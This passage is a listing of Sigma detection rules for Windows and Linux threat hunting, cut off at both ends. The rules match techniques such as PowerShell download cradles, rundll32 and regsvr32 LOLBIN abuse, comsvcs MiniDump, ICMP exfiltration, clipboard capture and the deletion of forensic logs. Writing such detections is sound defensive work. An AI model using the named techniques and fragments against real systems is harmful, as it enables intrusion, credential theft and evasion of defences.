- 'pwsh.dll'
selection_fsutil_cli:
CommandLine|contains|all:
- 'fsutil'
- 'behavior'
- 'set'
- 'SymlinkEvaluation'
selection_symlink_params:
CommandLine|contains:
- 'R2L:1' # Remote to Local
- 'R2R:1' # Remote to Remote
- 'L2L:1' # Local to Local
condition: all of selection_*
falsepositives:
- Legitimate usage, investigate the parent process and context to determine if benign.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Potentially Suspicious Named Pipe Created Via Mkfifo
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
view Sigma YAML
title: Potentially Suspicious Named Pipe Created Via Mkfifo
id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a
related:
- id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
type: derived
status: test
description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
references:
- https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/mkfifo'
# Note: Add more potentially suspicious locations
CommandLine|contains: ' /tmp/'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Potentially Suspicious Ping/Copy Command Combination
Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
view Sigma YAML
title: Potentially Suspicious Ping/Copy Command Combination
id: ded2b07a-d12f-4284-9b76-653e37b6c8b0
status: test
description: |
Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
references:
- Internal Research
author: X__Junior (Nextron Systems)
date: 2023-07-18
modified: 2024-03-06
tags:
- attack.stealth
- attack.t1070.004
logsource:
category: process_creation
product: windows
detection:
# Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277
selection_cmd:
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'Cmd.Exe'
selection_action:
CommandLine|contains|all:
- 'ping' # Covers "ping" and "ping.exe"
- 'copy '
selection_cli_1:
CommandLine|contains|windash: ' -n ' # Count
selection_cli_2:
CommandLine|contains|windash: ' -y '
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious PowerShell Child Processes
Detects potentially suspicious child processes spawned by PowerShell.
Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
view Sigma YAML
title: Potentially Suspicious PowerShell Child Processes
id: e4b6d2a7-d8a4-4f19-acbd-943c16d90647
status: test
description: |
Detects potentially suspicious child processes spawned by PowerShell.
Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
references:
- https://twitter.com/ankit_anubhav/status/1518835408502620162
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2022-04-26
modified: 2024-07-16
tags:
- attack.execution
- attack.t1059.001
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
Image|endswith:
- '\bash.exe'
- '\bitsadmin.exe'
- '\certutil.exe'
- '\cscript.exe'
- '\forfiles.exe'
- '\hh.exe'
- '\mshta.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\schtasks.exe'
- '\scrcons.exe'
- '\scriptrunner.exe'
- '\sh.exe'
- '\wmic.exe'
- '\wscript.exe'
filter_optional_amazon:
ParentCommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\' # AWS Workspaces
CommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\' # AWS Workspaces
filter_main_certutil_verify_store:
Image|endswith: '\certutil.exe'
CommandLine|contains: '-verifystore '
filter_main_wmic:
Image|endswith: '\wmic.exe'
CommandLine|contains:
- 'qfe list'
- 'diskdrive '
- 'csproduct '
- 'computersystem '
- ' os '
- ''
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts.
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Powershell Script Execution From Temp Folder
Detects a potentially suspicious powershell script executions from temporary folder
view Sigma YAML
title: Potentially Suspicious Powershell Script Execution From Temp Folder
id: a6a39bdb-935c-4f0a-ab77-35f4bbf44d33
status: test
description: Detects a potentially suspicious powershell script executions from temporary folder
references:
- https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
date: 2021-07-14
modified: 2026-02-17
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains:
- '\Windows\Temp'
- '\Temporary Internet'
- '\AppData\Local\Temp'
- '\AppData\Roaming\Temp'
- '%TEMP%'
- '%TMP%'
- '%LocalAppData%\Temp'
filter_optional_vscode:
CommandLine|contains: '-WindowStyle hidden -Verb runAs'
filter_optional_amazon_ec2:
CommandLine|contains: '\Windows\system32\config\systemprofile\AppData\Local\Temp\Amazon\EC2-Windows\'
filter_optional_generic:
CommandLine|contains:
- ' >'
- 'Out-File'
- 'ConvertTo-Json'
filter_optional_chocolatey_installer:
ParentImage:
- 'C:\Windows\System32\Msiexec.exe'
- 'C:\Windows\SysWOW64\Msiexec.exe'
Image|endswith: '\powershell.exe'
CommandLine|contains|all:
- '-NoProfile -ExecutionPolicy Bypass -Command'
- 'AppData\Local\Temp\'
- 'Install-Chocolatey.ps1'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Administrative scripts
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
view Sigma YAML
title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
id: 867356ee-9352-41c9-a8f2-1be690d78216
related:
- id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
type: obsolete
status: test
description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
references:
- https://twitter.com/mrd0x/status/1461041276514623491
- https://twitter.com/tccontre18/status/1480950986650832903
- https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
author: Florian Roth (Nextron Systems)
date: 2023-05-24
modified: 2023-05-26
tags:
- attack.stealth
- attack.t1218.010
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\regsvr32.exe'
- OriginalFileName: 'REGSVR32.EXE'
selection_flag:
CommandLine|contains:
- ' /i'
- ' -i'
selection_protocol:
CommandLine|contains:
- 'ftp'
- 'http'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Rundll32 Activity
Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
view Sigma YAML
title: Potentially Suspicious Rundll32 Activity
id: e593cf51-88db-4ee1-b920-37e89012a3c9
status: test
description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
references:
- http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
- https://twitter.com/Hexacorn/status/885258886428725250
- https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
- https://twitter.com/nas_bench/status/1433344116071583746 # dfshim.dll,ShOpenVerbShortcut
- https://twitter.com/eral4m/status/1479106975967240209 # scrobj.dll,GenerateTypeLib
- https://twitter.com/eral4m/status/1479080793003671557 # shimgvw.dll,ImageView_Fullscreen
author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
date: 2019-01-16
modified: 2023-05-17
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains|all:
- 'javascript:'
- '.RegisterXLL'
- CommandLine|contains|all:
- 'url.dll'
- 'OpenURL'
- CommandLine|contains|all:
- 'url.dll'
- 'OpenURLA'
- CommandLine|contains|all:
- 'url.dll'
- 'FileProtocolHandler'
- CommandLine|contains|all:
- 'zipfldr.dll'
- 'RouteTheCall'
- CommandLine|contains|all:
- 'shell32.dll'
- 'Control_RunDLL'
- CommandLine|contains|all:
- 'shell32.dll'
- 'ShellExec_RunDLL'
- CommandLine|contains|all:
- 'mshtml.dll'
- 'PrintHTML'
- CommandLine|contains|all:
- 'advpack.dll'
- 'LaunchINFSection'
- CommandLine|contains|all:
- 'advpack.dll'
- 'RegisterOCX'
- CommandLine|contains|all:
- 'ieadvpack.dll'
- 'LaunchINFSection'
- CommandLine|contains|all:
- 'ieadvpack.dll'
- 'RegisterOCX'
- CommandLine|contains|all:
- 'ieframe.dll'
- 'OpenURL'
- CommandLine|contains|all:
- 'shdocvw.dll'
- 'OpenURL'
- CommandLine|contains|all:
- 'syssetup.dll'
- 'SetupInfObjectInstallAction'
- CommandLine|contains|all:
- 'setupapi.dll'
- 'InstallHinfSection'
- CommandLine|contains|all:
- 'pcwutl.dll'
- 'LaunchApplication'
- CommandLine|contains|all:
- 'dfshim.dll'
- 'ShOpenVerbApplication'
- CommandLine|contains|all:
- 'dfshim.dll'
- 'ShOpenVerbShortcut'
- CommandLine|contains|all:
- 'scrobj.dll'
- 'GenerateTypeLib'
- 'http'
- CommandLine|contains|all:
- 'shimgvw.dll'
- 'ImageView_Fullscreen'
- 'http'
- CommandLine|contains|all:
- 'comsvcs.dll'
- 'MiniDump'
filter_main_screensaver:
CommandLine|contains: 'shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver'
filter_main_parent_cpl: # Settings
ParentImage: 'C:\Windows\System32\control.exe'
ParentCommandLine|contains: '.cpl'
CommandLine|contains|all:
- 'Shell32.dll'
- 'Control_RunDLL'
- '.cpl'
filter_main_startmenu:
ParentImage: 'C:\Windows\System32\control.exe'
CommandLine|startswith: '"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\'
CommandLine|endswith: '.cpl",'
condition: selection and not 1 of filter_main_*
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Rundll32.EXE Execution of UDL File
Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
view Sigma YAML
title: Potentially Suspicious Rundll32.EXE Execution of UDL File
id: 0ea52357-cd59-4340-9981-c46c7e900428
status: test
description: |
Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
references:
- https://trustedsec.com/blog/oops-i-udld-it-again
author: '@kostastsale'
date: 2024-08-16
tags:
- attack.execution
- attack.command-and-control
- attack.stealth
- attack.t1218.011
- attack.t1071
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
selection_cli:
CommandLine|contains|all:
- 'oledb32.dll'
- ',OpenDSLFile '
- '\\Users\\*\\Downloads\\' # Note: You can adjust the path to the download directory or other directories according to your environment.
CommandLine|endswith: '.udl'
condition: all of selection_*
falsepositives:
- UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Potentially Suspicious Self Extraction Directive File Created
Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Usually ".sed" files are simple ini files and not PE binaries.
view Sigma YAML
title: Potentially Suspicious Self Extraction Directive File Created
id: ab90dab8-c7da-4010-9193-563528cfa347
related:
- id: 760e75d8-c3b5-409b-a9bf-6130b4c4603f
type: derived
status: test
description: |
Detects the creation of a binary file with the ".sed" extension. The ".sed" extension stand for Self Extraction Directive files.
These files are used by the "iexpress.exe" utility in order to create self extracting packages.
Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
Usually ".sed" files are simple ini files and not PE binaries.
references:
- https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html
- https://en.wikipedia.org/wiki/IExpress
- https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2024-02-05
tags:
- attack.stealth
- attack.t1218
logsource:
product: windows
category: file_executable_detected
detection:
selection:
TargetFilename|endswith: '.sed'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Potentially Suspicious Usage Of Qemu
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
view Sigma YAML
title: Potentially Suspicious Usage Of Qemu
id: 5fc297ae-25b6-488a-8f25-cc12ac29b744
status: test
description: |
Detects potentially suspicious execution of the Qemu utility in a Windows environment.
Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
references:
- https://securelist.com/network-tunneling-with-qemu/111803/
- https://www.qemu.org/docs/master/system/invocation.html#hxtool-5
author: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
date: 2024-06-03
tags:
- attack.command-and-control
- attack.t1090
- attack.t1572
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- '-m 1M' # VM with just 1MB of ram is insufficient this is a suspicious flag
- '-m 2M'
- '-m 3M'
CommandLine|contains|all:
- 'restrict=off'
- '-netdev '
- 'connect='
- '-nographic' # This is also a key detection no one invoke without UI from console usually its a flag.
filter_main_normal_usecase:
CommandLine|contains:
- ' -cdrom ' # Normal usage cases
- ' type=virt '
- ' -blockdev '
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious WDAC Policy File Creation
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
view Sigma YAML
title: Potentially Suspicious WDAC Policy File Creation
id: 1d2de8a6-4803-4fde-b85b-f58f3aa7a705
status: experimental
description: |
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.
references:
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy
- https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/
- https://github.com/logangoins/Krueger/tree/main
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm
author: X__Junior
date: 2025-02-07
modified: 2026-05-18
tags:
- attack.defense-impairment
logsource:
category: file_event
product: windows
detection:
selection_target:
# This is a default location but unfortunately it could be any path configured in Group Policy Management Editor.
# No file extension needed because any extension would work, check first reference.
TargetFilename|contains: '\Windows\System32\CodeIntegrity\'
filter_main_images:
Image|endswith:
- '\Microsoft.ConfigurationManagement.exe' # Replace with full path to avoid false negatives
- '\WDAC Wizard.exe' # Replace with full path to avoid false negatives
- 'C:\Program Files\PowerShell\7-preview\pwsh.exe'
- 'C:\Program Files\PowerShell\7\pwsh.exe'
- 'C:\Windows\System32\dllhost.exe'
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
- 'C:\Windows\SysWOW64\dllhost.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe'
- 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
filter_main_cli:
- CommandLine|contains|all:
- 'ConvertFrom-CIPolicy -XmlFilePath'
- '-BinaryFilePath '
- CommandLine|contains: 'CiTool --update-policy'
- CommandLine|contains|all:
- 'Copy-Item -Path'
- '-Destination'
filter_main_system:
Image: 'System'
filter_main_wuauclt:
Image: 'C:\Windows\System32\wuauclt.exe'
filter_main_wuaucltcore:
Image:
- 'C:\Windows\UUS\arm64\wuaucltcore.exe'
- 'C:\Windows\UUS\Packages\Preview\arm64\wuaucltcore.exe'
condition: selection_target and not 1 of filter_main_*
falsepositives:
- Administrators and security vendors could leverage WDAC, apply additional filters as needed.
level: medium
Convert to SIEM query
medium
Moderate
High FP
Potentially Suspicious WebDAV LNK Execution
Detects possible execution via LNK file accessed on a WebDAV server.
view Sigma YAML
title: Potentially Suspicious WebDAV LNK Execution
id: 1412aa78-a24c-4abd-83df-767dfb2c5bbe
related:
- id: f0507c0f-a3a2-40f5-acc6-7f543c334993
type: similar
status: test
description: Detects possible execution via LNK file accessed on a WebDAV server.
references:
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
author: Micah Babinski
date: 2023-08-21
tags:
- attack.execution
- attack.t1059.001
- attack.t1204
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\explorer.exe'
Image|endswith:
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\wscript.exe'
CommandLine|contains: '\DavWWWRoot\'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Potentially Suspicious Windows App Activity
Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
view Sigma YAML
title: Potentially Suspicious Windows App Activity
id: f91ed517-a6ba-471d-9910-b3b4a398c0f3
status: test
description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
references:
- https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
- https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-12
modified: 2025-10-07
tags:
- attack.stealth
logsource:
product: windows
category: process_creation
detection:
selection_parent:
# GrandParentImage|endswith: '\sihost.exe'
ParentImage|contains: 'C:\Program Files\WindowsApps\'
selection_susp_img:
Image|endswith:
# You can add more LOLBINs
- '\cmd.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\powershell_ise.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\wscript.exe'
selection_susp_cli:
# You can add more potentially suspicious keywords
CommandLine|contains:
- 'cmd /c'
- 'Invoke-'
- 'Base64'
filter_optional_terminal:
ParentImage|contains: ':\Program Files\WindowsApps\Microsoft.WindowsTerminal'
ParentImage|endswith: '\WindowsTerminal.exe'
# Note: to avoid FP add the default shells and profiles that your WT integrates
Image|endswith:
- '\powershell.exe'
- '\cmd.exe'
- '\pwsh.exe'
filter_optional_sysinternals:
ParentImage|startswith: 'C:\Program Files\WindowsApps\Microsoft.SysinternalsSuite'
Image|endswith: '\cmd.exe'
condition: selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*
falsepositives:
- Legitimate packages that make use of external binaries such as Windows Terminal
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
PowerShell Console History Logs Deleted
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
view Sigma YAML
title: PowerShell Console History Logs Deleted
id: ff301988-c231-4bd0-834c-ac9d73b86586
status: test
description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
tags:
- attack.stealth
- attack.t1070
logsource:
category: file_delete
product: windows
detection:
selection:
TargetFilename|endswith: '\PSReadLine\ConsoleHost_history.txt'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
PowerShell Core DLL Loaded Via Office Application
Detects PowerShell core DLL being loaded by an Office Product
view Sigma YAML
title: PowerShell Core DLL Loaded Via Office Application
id: bb2ba6fb-95d4-4a25-89fc-30bb736c021a
status: test
description: Detects PowerShell core DLL being loaded by an Office Product
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-01
tags:
- attack.stealth
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith:
- '\excel.exe'
- '\mspub.exe'
- '\outlook.exe'
- '\onenote.exe'
- '\onenoteim.exe' # Just in case
- '\powerpnt.exe'
- '\winword.exe'
ImageLoaded|contains:
- '\System.Management.Automation.Dll'
- '\System.Management.Automation.ni.Dll'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Create Local User
Detects creation of a local user via PowerShell
view Sigma YAML
title: PowerShell Create Local User
id: 243de76f-4725-4f2e-8225-a8a69b15ad61
status: test
description: Detects creation of a local user via PowerShell
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
author: '@ROxPinTeddy'
date: 2020-04-11
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.001
- attack.persistence
- attack.t1136.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains: 'New-LocalUser'
condition: selection
falsepositives:
- Legitimate user creation
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Deleted Mounted Share
Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
view Sigma YAML
title: PowerShell Deleted Mounted Share
id: 66a4d409-451b-4151-94f4-a55d559c49b0
status: test
description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
author: 'oscd.community, @redcanary, Zach Stanford @svch0st'
date: 2020-10-08
modified: 2025-10-07
tags:
- attack.stealth
- attack.t1070.005
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Remove-SmbShare'
- 'Remove-FileShare'
filter_main_module_load:
ScriptBlockText|contains|all:
- 'FileShare.cdxml'
- 'Microsoft.PowerShell.Core\Export-ModuleMember'
- 'ROOT/Microsoft/Windows/Storage/MSFT_FileShare'
- 'ObjectModelWrapper'
- 'Cmdletization.MethodParameter'
condition: selection and not 1 of filter_main_*
falsepositives:
- Administrators or Power users may remove their shares via cmd line
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
PowerShell Downgrade Attack - PowerShell
Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
view Sigma YAML
title: PowerShell Downgrade Attack - PowerShell
id: 6331d09b-4785-4c13-980f-f96661356249
status: test
description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
references:
- http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)
date: 2017-03-22
modified: 2023-10-27
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_classic_start
detection:
selection:
Data|contains: 'EngineVersion=2.'
filter_main:
Data|contains: 'HostVersion=2.'
condition: selection and not filter_main
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Download Pattern
Detects a Powershell process that contains download commands in its command line string
view Sigma YAML
title: PowerShell Download Pattern
id: 3b6ab547-8ec2-4991-b9d2-2b06702a48d7
related:
- id: e6c54d94-498c-4562-a37c-b469d8e9a275
type: derived
- id: 8f70ac5f-1f6f-4f8e-b454-db19561216c5
type: obsolete
status: test
description: Detects a Powershell process that contains download commands in its command line string
references:
- https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html
- https://lab52.io/blog/winter-vivern-all-summer/
- https://hatching.io/blog/powershell-analysis/
author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
date: 2019-01-16
modified: 2025-10-20
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell_ise.exe'
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell_ISE.EXE'
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains|all:
- 'new-object'
- 'net.webclient).'
- 'download'
CommandLine|contains:
- 'string('
- 'file('
condition: all of selection_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Get Clipboard
A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
view Sigma YAML
title: PowerShell Get Clipboard
id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78
status: test
description: A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/16
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2023-01-04
tags:
- attack.collection
- attack.t1115
logsource:
product: windows
category: ps_module
definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
detection:
selection:
Payload|contains: 'Get-Clipboard'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Get-Clipboard Cmdlet Via CLI
Detects usage of the 'Get-Clipboard' cmdlet via CLI
view Sigma YAML
title: PowerShell Get-Clipboard Cmdlet Via CLI
id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3
related:
- id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78
type: derived
status: test
description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
references:
- https://github.com/OTRF/detection-hackathon-apt29/issues/16
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2020-05-02
modified: 2022-12-25
tags:
- attack.collection
- attack.t1115
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: 'Get-Clipboard'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell Hotfix Enumeration
Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
view Sigma YAML
title: PowerShell Hotfix Enumeration
id: f5d1def8-1de0-4a0e-9794-1f6f27dd605c
status: test
description: Detects call to "Win32_QuickFixEngineering" in order to enumerate installed hotfixes often used in "enum" scripts by attackers
references:
- https://github.com/411Hall/JAWS/blob/233f142fcb1488172aa74228a666f6b3c5c48f1d/jaws-enum.ps1
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-21
tags:
- attack.discovery
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Win32_QuickFixEngineering'
- 'HotFixID'
condition: selection
falsepositives:
- Legitimate administration scripts
level: medium
Convert to SIEM query
medium
Moderate
High FP
PowerShell ICMP Exfiltration
Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
view Sigma YAML
title: PowerShell ICMP Exfiltration
id: 4c4af3cd-2115-479c-8193-6b8bfce9001c
status: test
description: Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-2---exfiltration-over-alternative-protocol---icmp
author: 'Bartlomiej Czyz @bczyz1, oscd.community'
date: 2020-10-10
modified: 2022-12-25
tags:
- attack.exfiltration
- attack.t1048.003
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-Object'
- 'System.Net.NetworkInformation.Ping'
- '.Send('
condition: selection
falsepositives:
- Legitimate usage of System.Net.NetworkInformation.Ping class
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
PowerShell MSI Install via WindowsInstaller COM From Remote Location
Detects the execution of PowerShell commands that attempt to install MSI packages via the
Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
view Sigma YAML
title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
id: 222720a7-047f-4054-baa5-bab9be757db0
status: experimental
description: |
Detects the execution of PowerShell commands that attempt to install MSI packages via the
